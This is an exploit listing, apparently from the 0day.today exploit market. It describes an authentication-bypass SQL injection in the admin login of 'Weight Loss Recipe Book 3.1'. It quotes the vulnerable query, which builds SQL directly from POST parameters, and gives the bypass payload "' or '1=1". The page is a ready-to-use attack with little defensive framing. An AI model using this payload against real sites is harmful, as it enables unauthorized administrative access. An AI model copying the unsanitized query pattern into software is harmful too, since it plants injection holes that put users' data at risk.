[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Weight Loss Recipe Book 3.1 (Auth Bypass) SQL Injection Vuln

Author
x0r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4636
Category
web applications
Date add
11-01-2009
Platform
unsorted
============================================================
Weight Loss Recipe Book 3.1 (Auth Bypass) SQL Injection Vuln
============================================================


###############################
# Weight Loss Recipe Book 3.1 #
###############################

Autore: x0r
Cms Site: http://www.my-health-and-fitness.org/weight-loss-recipe-book.html
################################

Bug In \wlrb_files\admin-login.php

SELECT *
				FROM ' . $program_prefix . 'administrators
				WHERE administrators_username = "' . $_POST['administrators_username']
. '" and
					administrators_pass = PASSWORD("' . $_POST['administrators_pass'] .
'")';
					
Exploit: ' or '1=1

##############################

Greetz: EdGaR :P



#  0day.today [2024-11-15]  #